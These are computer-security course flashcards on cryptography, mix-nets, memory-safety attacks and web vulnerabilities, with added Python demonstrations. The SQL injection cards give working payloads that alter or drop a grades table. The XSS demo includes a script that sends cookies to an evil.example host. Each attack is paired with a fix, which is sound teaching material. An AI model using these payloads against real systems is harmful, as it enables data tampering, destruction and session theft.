Term
What is a method by which to ensure integrity of a given message, assuming a shared symmetric key? |
|
Definition
Message authentication code (MAC): sender and receiver share a key k; the sender appends a tag t = MAC(k, m), and the receiver recomputes the tag with the same k and rejects the message if it does not match. |


Term
A hash function is an example of this. |
|
Definition
One-way function (NO trapdoor) |
|
|
Term
A signed attestation that a given principal owns a given public key. |
|
Definition
Certificate (e.g., an X.509 certificate signed by a certificate authority). |


Term
Salts are a necessary ingredient in achieving this property when storing passwords. |
|
Definition
Resilience to a precomputed dictionary (rainbow-table) attack: with a random per-user salt, the attacker cannot build one table of hashed guesses and reuse it against every user, but must redo every guess for every salt. (A salt does not stop a dictionary attack against a single weak password; that needs a slow hash.) |
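Added example (not from the original flashcards) showing the property above: two users who chose the same weak password, stored once unsalted and once salted with PBKDF2. The iteration count, salt size, user names and the attacker's word list are this example's own choices.

```python
import hashlib
import hmac
import os
from typing import Dict, List, Optional, Tuple

# Added example (not from the original flashcards). Iteration count, salt size
# and the sample user names/passwords below are illustrative choices.
ITERATIONS = 100_000
SALT_BYTES = 16
WORDLIST = ["password", "letmein", "hunter2", "qwerty"]   # constructed attacker dictionary


def hash_password(password: str, salt: Optional[bytes] = None) -> Tuple[bytes, bytes]:
    """Return (salt, digest); draws a fresh random salt when none is supplied."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest


def verify_password(password: str, salt: bytes, digest: bytes) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    _, candidate = hash_password(password, salt)
    return hmac.compare_digest(candidate, digest)


def precomputed_attack(store: Dict[str, bytes], wordlist: List[str]) -> Dict[str, str]:
    """Unsalted store: build the dictionary ONCE, then crack every user by lookup."""
    table = {hashlib.sha256(w.encode()).digest(): w for w in wordlist}
    return {user: table[d] for user, d in store.items() if d in table}


def salted_attack(store: Dict[str, Tuple[bytes, bytes]], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Salted store: no table can be shared, every guess is recomputed per user.
    Returns (cracked users, number of password hashes the attacker had to compute)."""
    cracked, work = {}, 0
    for user, (salt, digest) in store.items():
        for w in wordlist:
            work += 1
            if verify_password(w, salt, digest):
                cracked[user] = w
                break
    return cracked, work


def demo() -> dict:
    """alice and bob chose the same weak password; compare the two storage schemes."""
    unsalted = {u: hashlib.sha256(b"hunter2").digest() for u in ("alice", "bob")}
    salted = {u: hash_password("hunter2") for u in ("alice", "bob")}
    cracked_salted, work = salted_attack(salted, WORDLIST)
    return {
        "unsalted_digests_equal": unsalted["alice"] == unsalted["bob"],   # leaks that they share a password
        "unsalted_cracked": precomputed_attack(unsalted, WORDLIST),
        "salted_digests_equal": salted["alice"][1] == salted["bob"][1],
        "salted_cracked": cracked_salted,
        "salted_work": work,   # 3 guesses per user; nothing is reusable between users
        "verify_ok": verify_password("hunter2", *salted["alice"]),
        "verify_wrong": verify_password("Hunter2", *salted["alice"]),
    }
```

Note that the salted store is still cracked: the salt only removes the shared precomputed table and the "same digest, same password" leak; the per-guess cost comes from the slow, iterated hash.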
|
|
Term
The property that a man-in-the-middle cannot undetectably tamper with a transmitted message. |
|
Definition
Integrity (provided by a MAC under a shared key, or by a digital signature). |


Term
The preferred method of symmetric-key encryption. |
|
Definition
|
|
Term
The property that an eavesdropper cannot infer anything about a transmitted message. |
|
Definition
Confidentiality. |


Term
Compare and contrast a traditional PKI with PGP (give one similarity and one difference) |
|
Definition
Similarities: both are based on trust and both bind public keys to principals. Difference: a traditional PKI relies on a hierarchy of certificate authorities, whereas PGP uses a web of trust in which users certify each other's keys, which allows for more complex trust functions. |
|
|
Term
In the wake of the Heartbleed bug, which protocol consumed greater bandwidth than normal: CRLs, OCSP, or both? Why? |
|
Definition
CRLs. A CRL lists every revoked certificate, so its size, and the bandwidth needed to fetch it, grows with the number of certificates revoked; Heartbleed triggered mass revocations. An OCSP response covers a single certificate, so its size is roughly constant and total OCSP bandwidth depends only on users' browsing habits, not on how many certificates were revoked. |
|
|
Term
Symmetric-key crypto mechanisms have different “modes” of encryption like CBC, ECB, etc. There are none for public-key crypto. Why not? What is the alternative? |
|
Definition
Public-key operations are far too slow to apply block by block to a long message. The alternative is hybrid encryption: encrypt a fresh random symmetric key under the recipient's public key, and encrypt the message itself under that symmetric key. |
|
|
Term
Explain why you should never use ECB. |
|
Definition
ECB encrypts each block independently, so identical plaintext blocks produce identical ciphertext blocks: the ciphertext leaks the pattern of repeated information in the plaintext. |
|
|
Term
Between CTR mode and CBC mode, which is able to encrypt messages more efficiently? |
|
Definition
CTR mode: each block's keystream depends only on the nonce and the counter, not on the output of the previous block, so all blocks can be encrypted in parallel. CBC encryption is inherently sequential because each plaintext block is XORed with the previous ciphertext block before encryption. |
|
|
Term
Between CTR mode and CBC mode, which is able to decrypt messages more efficiently? |
|
Definition
Neither: both can decrypt in parallel. In CBC, decrypting block i needs only ciphertext blocks i and i-1, which are all available at once. |
|
|
Term
What role do junk messages play in a mix-net? |
|
Definition
Junk (dummy) messages let the mix fill and flush a batch promptly, so it achieves anonymity in a timely fashion even when only a small number of clients have anything real to send. |
|
|
Term
Suppose that there are N > 5 clients who wish to send, but that the mix-net server only has enough memory to buffer 5 messages at any time. How would you modify the mix-net protocol summarized above to ensure that all senders eventually get to communicate without compromising their anonymity to a passive eavesdropper? |
|
Definition
Collect messages as before, but when more than 5 arrive, keep a random 5 and drop the rest; the dropped senders retransmit in a later round, so everyone eventually gets through. You lose some performance, but a passive eavesdropper still only ever sees uniformly shuffled batches, so anonymity is not reduced. |
|
|
Term
Consider the dining cryptographers’ problem with N participants (recall that this includes having every pair of participants generate a shared random bit). Suppose that an attacker controlled N − 2 participants. What does the attacker learn about who sent the message when N > 3? |
|
Definition
If the attacker controls all but two participants, the protocol reduces to the three-player case from the attacker's point of view. The attacker learns that the message came from one of the two honest participants, but nothing about which one: the only shared bit it does not know is the bit those two share, and that bit masks which of them XORed in the message. |
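Added example (not from the original flashcards) that runs the N-participant protocol and computes the colluding attacker's view. Participant numbering, the choice of which two participants are honest, and the one-bit message are this example's own choices.

```python
import secrets
from itertools import combinations
from typing import Dict, List, Tuple

# Added example (not from the original flashcards): one-bit dining cryptographers
# round with N participants, then the view of an attacker controlling N - 2 of them.
Pair = Tuple[int, int]


def share_keys(n: int) -> Dict[Pair, int]:
    """Every pair of participants agrees on one secret random bit."""
    return {pair: secrets.randbits(1) for pair in combinations(range(n), 2)}


def announce(n: int, shared: Dict[Pair, int], sender: int, message: int) -> List[int]:
    """Each participant announces the XOR of all bits it shares; the sender also XORs in the message."""
    out = []
    for i in range(n):
        b = 0
        for pair, bit in shared.items():
            if i in pair:
                b ^= bit
        if i == sender:
            b ^= message
        out.append(b)
    return out


def recover(announcements: List[int]) -> int:
    """Anyone can recover the message: every shared bit appears twice and cancels."""
    m = 0
    for a in announcements:
        m ^= a
    return m


def attacker_residual(shared: Dict[Pair, int], announcements: List[int], honest: Pair) -> Dict[int, int]:
    """Attacker controls everyone except honest = (a, b), so it knows every shared bit
    except s_ab. Stripping the known bits from the two honest announcements leaves
    r_a = s_ab ^ (m if a sent) and r_b = s_ab ^ (m if b sent)."""
    a, b = sorted(honest)
    residual = {}
    for i in (a, b):
        r = announcements[i]
        for pair, bit in shared.items():
            if i in pair and pair != (a, b):
                r ^= bit
        residual[i] = r
    return residual


def possible_views(n: int, honest: Pair, message: int = 1) -> Dict[int, frozenset]:
    """For each candidate honest sender, the set of residual pairs the attacker could
    observe as the unknown bit s_ab ranges over {0, 1}. Equal sets mean the two
    candidates are indistinguishable to the attacker."""
    a, b = sorted(honest)
    views = {}
    for sender in (a, b):
        seen = set()
        for s_ab in (0, 1):
            shared = share_keys(n)
            shared[(a, b)] = s_ab            # fix the one bit the attacker does not know
            ann = announce(n, shared, sender, message)
            assert recover(ann) == message   # the message itself is never hidden
            r = attacker_residual(shared, ann, (a, b))
            seen.add((r[a], r[b]))
        views[sender] = frozenset(seen)
    return views
```

The attacker does learn r_a XOR r_b = m, i.e. that a message came from the honest pair, which is exactly the "one of the two" the card describes; the identity of the sender is hidden by s_ab alone.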
|
|
Term
Describe a scenario where you would prefer a digital signature over a MAC, and a scenario where you would prefer a MAC over a digital signature. |
|
Definition
MAC: when the two parties already share a symmetric key, e.g., one-to-one communication (faster, and shorter tags). Digital signature: when they do not share a key, or when many parties must be able to verify a message without any of them being able to forge it, e.g., one-to-many communication such as distributing software updates. |
|
|
Term
Define the property that a MAC must support in order to be considered secure |
|
Definition
Existential unforgeability under chosen-message attack: even with access to tags on messages of its choosing (a set of valid (m, t) pairs), the attacker cannot produce a valid tag t2 for any new message m2. |
|
|
Term
Encrypt then MAC |
|
Definition
c = E(x); t = M(c); send (c, t). The tag covers the ciphertext, so the receiver verifies t before decrypting anything. |


Term
MAC then Encrypt |
|
Definition
t = M(x); c = E(x || t); send c. The receiver must decrypt before it can check the tag. |


Term
Encrypt and MAC |
|
Definition
c = E(x); t = M(x); send (c, t). The tag is computed over the plaintext and sent in the clear; a MAC is not required to hide its input, so t may leak information about x. |


Term
Which combination of encrypt and MAC is preferred? why? |
|
Definition
Encrypt then MAC. It is secure for an arbitrary combination of a secure E and a secure M (the other two orderings are only secure for particular choices), and the receiver can reject a forged or tampered ciphertext before decrypting it. |
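Added example (not from the original flashcards) covering the CTR-mode cards and the encrypt-then-MAC card above. The block cipher is stood in by a keyed PRF (HMAC-SHA256 truncated to 16 bytes) so the code runs on the standard library alone; CTR mode needs only a PRF, and a real system would use AES. Key sizes, the 8-byte nonce and the sample messages are this example's choices.

```python
import hashlib
import hmac
import os
from typing import Optional, Tuple

# Added example (not from the original flashcards). The "block cipher" here is a
# keyed PRF standing in for AES; CTR mode is a correct construction over any PRF.
BLOCK = 16


def prf(key: bytes, block_in: bytes) -> bytes:
    """One 'block-cipher' call: a keyed pseudorandom function of a 16-byte input."""
    return hmac.new(key, block_in, hashlib.sha256).digest()[:BLOCK]


def ctr_crypt(key: bytes, nonce: bytes, data: bytes, first_block: int = 0) -> bytes:
    """CTR mode. Keystream block i = PRF(key, nonce || i); the same XOR encrypts and
    decrypts, and block i depends on nothing but (nonce, i), so blocks can be
    processed in any order or in parallel. first_block selects where to start."""
    out = bytearray()
    for off in range(0, len(data), BLOCK):
        counter = (first_block + off // BLOCK).to_bytes(8, "big")
        keystream = prf(key, nonce + counter)
        out += bytes(c ^ k for c, k in zip(data[off:off + BLOCK], keystream))
    return bytes(out)


def etm_encrypt(enc_key: bytes, mac_key: bytes, plaintext: bytes) -> Tuple[bytes, bytes, bytes]:
    """Encrypt-then-MAC: c = E(x), t = M(nonce || c). The nonce is under the MAC too,
    so an attacker cannot pair a valid (c, t) with a different nonce."""
    nonce = os.urandom(8)
    ciphertext = ctr_crypt(enc_key, nonce, plaintext)
    tag = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    return nonce, ciphertext, tag


def etm_decrypt(enc_key: bytes, mac_key: bytes, nonce: bytes, ciphertext: bytes, tag: bytes) -> Optional[bytes]:
    """Verify the tag FIRST (constant-time compare); only then decrypt.
    Returns None for anything that fails verification."""
    expected = hmac.new(mac_key, nonce + ciphertext, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, tag):
        return None
    return ctr_crypt(enc_key, nonce, ciphertext)


def flip_bit(data: bytes, byte_index: int, bit: int) -> bytes:
    """Attacker tool: flip one bit of a message in transit."""
    b = bytearray(data)
    b[byte_index] ^= 1 << bit
    return bytes(b)


def demo() -> dict:
    enc_key, mac_key = os.urandom(32), os.urandom(32)   # independent keys for E and M
    pt = b"0123456789abcdef" + b"SECOND BLOCK...."        # two full blocks
    nonce, ct, tag = etm_encrypt(enc_key, mac_key, pt)
    tampered = flip_bit(ct, 0, 0)
    return {
        "roundtrip": etm_decrypt(enc_key, mac_key, nonce, ct, tag),
        # random access: decrypt only block 1 without touching block 0
        "block1_only": ctr_crypt(enc_key, nonce, ct[BLOCK:], first_block=1),
        # CTR alone is malleable: a flipped ciphertext bit flips the same plaintext bit
        "malleable_without_mac": ctr_crypt(enc_key, nonce, tampered) == flip_bit(pt, 0, 0),
        # with encrypt-then-MAC the same tampering is rejected before decryption
        "tampered_rejected": etm_decrypt(enc_key, mac_key, nonce, tampered, tag) is None,
        "wrong_nonce_rejected": etm_decrypt(enc_key, mac_key, os.urandom(8), ct, tag) is None,
    }
```

The malleability line is the reason the MAC is needed at all: CTR (like any stream construction) gives confidentiality but no integrity, and an attacker who knows part of the plaintext can rewrite it bit for bit.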
|
|
Term
Address space layout randomization |
|
Definition
A means by which the virtual addresses of various memory segments of a process are assigned random offsets. |
|
|
Term
Rootkit |
|
Definition
A piece of malware that keeps itself hidden from detection (e.g., by interposing between the user and the underlying system, or by overwriting system calls altogether). |
|
|
Term
Stack canary |
|
Definition
A value written between the local variables and the saved registers/return address that is difficult for an attacker to predict; the function checks it before returning, so a change to it indicates that a buffer overflow may have overwritten the saved return address. |
|
|
Term
Metamorphic virus |
|
Definition
A virus that rewrites its own code (preserving its behavior) each time it spreads, so that no static signature matches every copy. |
|
|
Term
Polymorphic virus |
|
Definition
A virus that encrypts its body with a different key each time it spreads, so the encrypted body never matches a fixed signature; only a small decryption routine stays in the clear. |
|
|
Term
Time of check/Time of use (TOCTOU) |
|
Definition
A vulnerability in which there is a window between (a) when a user's access to an object is checked and (b) when the user accesses the object, during which the object named by the check could have been replaced by something the user did not have access to. The fix is to operate on the object actually opened (e.g., a file descriptor) rather than re-resolving its name. |
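Added example (not from the original flashcards) of a check-then-open race on a file name, beside the fixed version that checks the object it actually opened. The "attacker" is a callback invoked between the check and the use so the race is reproducible; on a real system it is another process winning a timing race. File names and contents are constructed; it needs a POSIX filesystem with symlinks.

```python
import os
import stat
import tempfile
from typing import Callable, Optional

# Added example (not from the original flashcards). The attacker callback makes
# the race deterministic; requires symlinks (Linux/macOS).


def read_public_vulnerable(path: str, attacker: Callable[[], None] = lambda: None) -> Optional[bytes]:
    """TOCTOU: check the NAME, then open the NAME again. Between the two calls the
    name can be re-pointed at an object the caller should not be able to read."""
    st = os.lstat(path)                  # time of check
    if not stat.S_ISREG(st.st_mode):
        return None
    attacker()                           # the window
    with open(path, "rb") as f:          # time of use: re-resolves the name
        return f.read()


def read_public_fixed(path: str, attacker: Callable[[], None] = lambda: None) -> Optional[bytes]:
    """Open once, without following symlinks, then check the OBJECT we hold (fstat on
    the descriptor). Whatever happens to the name afterwards is irrelevant."""
    attacker()                           # attacker gets the same chance, before the open
    try:
        fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:                      # ELOOP: the name became a symlink; refuse it
        return None
    try:
        if not stat.S_ISREG(os.fstat(fd).st_mode):
            return None
        return os.read(fd, 1 << 16)
    finally:
        os.close(fd)


def demo() -> dict:
    """public.txt is meant to be readable; secret.txt is not (constructed contents)."""
    with tempfile.TemporaryDirectory() as d:
        public, secret = os.path.join(d, "public.txt"), os.path.join(d, "secret.txt")
        with open(secret, "wb") as f:
            f.write(b"TOP SECRET")

        def reset() -> None:
            if os.path.lexists(public):
                os.remove(public)
            with open(public, "wb") as f:
                f.write(b"public data")

        def swap() -> None:              # attacker: replace the checked file with a symlink
            os.remove(public)
            os.symlink(secret, public)

        reset()
        honest_vuln = read_public_vulnerable(public)
        reset()
        leaked = read_public_vulnerable(public, attacker=swap)
        reset()
        honest_fixed = read_public_fixed(public)
        reset()
        blocked = read_public_fixed(public, attacker=swap)
        return {"honest_vuln": honest_vuln, "leaked": leaked,
                "honest_fixed": honest_fixed, "blocked": blocked}
```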
|
|
Term
Time bomb (a logic bomb whose trigger is a time or date) |
|
Definition
A piece of malware that triggers after a certain amount of time (or at a particular date). |
|
|
Term
Fuzz testing (fuzzing) |
|
Definition
A software testing mechanism that generates random or malformed inputs and feeds them to the software, watching for crashes or other misbehavior. There are various kinds of fuzz testing, each corresponding to a different means of generating the inputs (purely random, mutation of valid inputs, generation from a grammar). |
|
|
Term
Agree or Disagree: Cross-site request forgery (CSRF) attacks are just special cases of cross-site scripting attacks (XSS). |
|
Definition
Disagree: CSRF exploits the trust a website places in its user's browser (the browser automatically attaches the user's credentials to a request the attacker forged), while XSS exploits the trust a user has in the content delivered by a website (the attacker's script runs in the site's origin). |
|
|
Term
On a SQL server: Provide a username and password that would allow you to view everyone’s grades. |
|
Definition
|
|
Term
On a SQL server: Provide a username and password that would allow you to give everyone in CMSC414 an A. |
|
Definition
'); UPDATE Grades SET StudentGrade='A' WHERE Course='CMSC414'; -- |
|
|
Term
On a SQL server: Provide a username and password that delete the Grades table altogether. |
|
Definition
'); DROP TABLE Grades; -- |


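Added example (not from the original flashcards) that runs the injection payloads from the cards above against a constructed database, beside a parameterised login that defeats them. The Users/Grades schema, the sample rows and the shape of the login query are assumptions chosen so the payloads work as written; sqlite3's executescript() stands in for a server that executes stacked statements. Passwords are stored in the clear only to keep the example short; a real Users table holds salted hashes.

```python
import sqlite3
from typing import Dict, Tuple

# Added example (not from the original flashcards). Schema, rows and query shape
# are assumptions made so the card payloads work as written.
SCHEMA = """
CREATE TABLE Users  (Username TEXT, Password TEXT);
CREATE TABLE Grades (Student TEXT, Course TEXT, StudentGrade TEXT);
INSERT INTO Users  VALUES ('alice', 's3cret');
INSERT INTO Grades VALUES ('alice', 'CMSC414', 'B'), ('bob', 'CMSC414', 'C'), ('carol', 'CMSC330', 'B+');
"""

GIVE_EVERYONE_AN_A = "'); UPDATE Grades SET StudentGrade='A' WHERE Course='CMSC414'; --"
DROP_GRADES = "'); DROP TABLE Grades; --"


def fresh_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def login_vulnerable(con: sqlite3.Connection, username: str, password: str) -> str:
    """Builds the query by string concatenation. Returns the SQL that actually ran."""
    sql = f"SELECT * FROM Users WHERE (Username='{username}' AND Password='{password}');"
    con.executescript(sql)      # like a server that runs every statement it is handed
    return sql


def login_safe(con: sqlite3.Connection, username: str, password: str) -> bool:
    """Parameterised query: the input is bound as data and can never become SQL."""
    row = con.execute(
        "SELECT COUNT(*) FROM Users WHERE Username=? AND Password=?", (username, password)
    ).fetchone()
    return row[0] > 0


def grades(con: sqlite3.Connection) -> Dict[Tuple[str, str], str]:
    return {(s, c): g for s, c, g in con.execute("SELECT Student, Course, StudentGrade FROM Grades")}


def table_exists(con: sqlite3.Connection, name: str) -> bool:
    row = con.execute("SELECT COUNT(*) FROM sqlite_master WHERE type='table' AND name=?", (name,)).fetchone()
    return row[0] == 1


def demo() -> dict:
    con = fresh_db()
    before = grades(con)
    ran = login_vulnerable(con, GIVE_EVERYONE_AN_A, "anything")
    after_update = grades(con)

    con2 = fresh_db()
    login_vulnerable(con2, DROP_GRADES, "anything")

    con3 = fresh_db()
    safe_login = login_safe(con3, GIVE_EVERYONE_AN_A, "anything")
    return {
        "query_that_ran": ran,
        "before": before,
        "after_update": after_update,
        "grades_table_survives_drop": table_exists(con2, "Grades"),
        "safe_login_accepted": safe_login,
        "safe_grades_unchanged": grades(con3) == before,
    }
```

Printing demo()["query_that_ran"] shows why the payload starts with ') and ends with --: the quote and parenthesis close the WHERE clause the server opened, and the comment swallows the rest of the original query.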
Term
You are given an application consisting of 40,000,000 lines of code. Describe a way you would go about determining whether this code was vulnerable to a buffer overflow exploit. |
|
Definition
Fuzz testing. Could also scan the code for unsafe functions (strcpy, gets, sprintf and the like), but this misses overflows that do not go through such a function, e.g., a buffer of the right size from malloc followed by a bad bounds check in a loop. |
|
|
Term
Programmer Pete has developed his own alternative to canaries. With each function call, he generates a random 8-bit, odd number, and pushes it onto the stack before loading any local variables. Describe how you would modify your typical buffer overflow attack to get around this, and reason about your likelihood of success. |
|
Definition
Include an extra byte between the buffer and the saved instruction pointer and set it to some fixed odd value (say, all ones). Keep trying until it works: there are 2^8 / 2 = 128 odd 8-bit values, so each attempt succeeds with probability 1/128 and on average about 128 attempts are needed. |
|
|
Term
Upset that you defeated his canaries, Programmer Pete decides to set all memory corresponding to a program’s stack to be non-executable. Describe how you would get around this. |
|
Definition
Return-to-libc or return-oriented programming (ROP): instead of injecting code onto the stack, overwrite the saved return address with the address of code that is already executable (e.g., system() in libc, or short "gadgets" ending in ret) and place its arguments or the gadget chain on the stack. Nothing on the stack ever needs to execute. |


Term
As a last-ditch effort, Programmer Pete changes his compiler so that both his stack and his heap grow up in memory (from low addresses to high). Does this change make code injection attacks impossible? Why or why not? |
|
Definition
No: an overflow still corrupts whatever lies in the direction of growth. In the heap it can overwrite neighboring objects up to saved addresses and function pointers, and on the stack the overflow now runs upward into the frames of functions called while the buffer is being filled (e.g., the copying routine itself), whose saved return addresses sit above the buffer. |
|
|
Term
Online banking site bank.com has a login page, with URLs of the form: http://bank.com/login.php?user= username&pass= password Name and describe a vulnerability in bank.com’s use of this approach. Also, briefly sketch a scenario in which an attacker would exploit this vulnerability. |
|
Definition
CSRF (cross-site request forgery): a login is a state-changing action performed on a plain GET with the credentials in the URL (which also leaves them in browser history, Referer headers and server logs). The attacker gets the user to visit his site, which includes, say, an <img> tag whose src is the login URL with the attacker's own credentials, forcing the user's browser to automatically log in as the attacker (a login CSRF). The attacker could subsequently learn the user's information entered into what is now the attacker's account, force him to pay the attacker's bills, or use this as a stepping stone to launder further attacks through the victim's machine. |
|
|
Term
To mitigate against this attack, bank.com changes their login URL to only include the username, that is, http://bank.com/login.php?user=username, which then sends users to a page that looks like: (img with username filled in)
This solved one attack while making another attack possible! Name and describe what new vulnerability bank.com just introduced. Also, briefly describe how an attacker could make use of this vulnerability. |
|
Definition
Reflected XSS: the username from the URL is echoed into the page without escaping, so an attacker crafts a link whose user parameter contains script and sends it to a victim who is already logged in; the script runs in bank.com's origin and can exfiltrate the user's session cookies or act on his behalf. |
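Added example (not from the original flashcards) for the two bank.com cards above: toy request handlers that reproduce the GET-based login CSRF and the reflected XSS, each beside a fixed version (POST with a session-bound CSRF token; HTML-escaping the reflected value). bank.com's real server is not on the page; the user database, session cookie value, token construction and the script payload are this example's assumptions.

```python
import hashlib
import hmac
import html
import secrets
from typing import Dict
from urllib.parse import parse_qs, quote, urlsplit

# Added example (not from the original flashcards). Users, cookie value and token
# construction are constructed for the demonstration.
CREDENTIALS = {"victim": "correct horse", "attacker": "hunter2"}   # constructed users
SERVER_KEY = secrets.token_bytes(32)


def csrf_token(session_cookie: str) -> str:
    """Token bound to the browser's own session cookie. A foreign site can make the
    browser SEND the cookie but cannot READ it, so it cannot compute this value."""
    return hmac.new(SERVER_KEY, session_cookie.encode(), hashlib.sha256).hexdigest()


def login_vulnerable(url: str) -> Dict[str, object]:
    """http://bank.com/login.php?user=...&pass=...: a state change on a bare GET.
    Any page the victim views can trigger it with
    <img src="http://bank.com/login.php?user=attacker&pass=hunter2">, logging the
    victim's browser into the attacker's account (login CSRF)."""
    q = parse_qs(urlsplit(url).query)
    user, pw = q.get("user", [""])[0], q.get("pass", [""])[0]
    if CREDENTIALS.get(user) == pw:
        return {"status": 200, "session_user": user}
    return {"status": 401}


def login_fixed(method: str, form: Dict[str, str], session_cookie: str) -> Dict[str, object]:
    """Credentials only in a POST body, and the form must carry the CSRF token for the
    session that submitted it. A cross-site <img> or auto-submitted form fails one of
    these checks before any credential is examined."""
    if method != "POST":
        return {"status": 405}
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_cookie)):
        return {"status": 403}
    user, pw = form.get("user", ""), form.get("pass", "")
    if CREDENTIALS.get(user) == pw:
        return {"status": 200, "session_user": user}
    return {"status": 401}


def username_page_vulnerable(url: str) -> str:
    """The second design: ?user= reflected straight into the form (reflected XSS)."""
    user = parse_qs(urlsplit(url).query).get("user", [""])[0]
    return f'<input name="user" value="{user}">'


def username_page_fixed(url: str) -> str:
    """Same page with the value escaped for an HTML attribute context."""
    user = parse_qs(urlsplit(url).query).get("user", [""])[0]
    return f'<input name="user" value="{html.escape(user, quote=True)}">'


XSS_PAYLOAD = '"><script>new Image().src="http://evil.example/?c="+document.cookie</script>'


def demo() -> dict:
    forged_get = "http://bank.com/login.php?user=attacker&pass=hunter2"   # what the <img> fetches
    xss_link = "http://bank.com/login.php?user=" + quote(XSS_PAYLOAD)     # link sent to the victim
    sess = "victim-session-cookie"
    good_form = {"user": "victim", "pass": "correct horse", "csrf_token": csrf_token(sess)}
    return {
        "csrf_login_succeeds": login_vulnerable(forged_get).get("session_user"),
        "fixed_rejects_get": login_fixed("GET", good_form, sess)["status"],
        "fixed_rejects_bad_token": login_fixed("POST", {**good_form, "csrf_token": "guess"}, sess)["status"],
        "fixed_accepts_real_form": login_fixed("POST", good_form, sess).get("session_user"),
        "reflected_unescaped": username_page_vulnerable(xss_link),
        "reflected_escaped": username_page_fixed(xss_link),
    }
```

Escaping must match the context the value lands in (here an attribute, hence quote=True); marking the session cookie SameSite and HttpOnly is worthwhile defense in depth, but it does not replace the token or the output escaping.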
|
|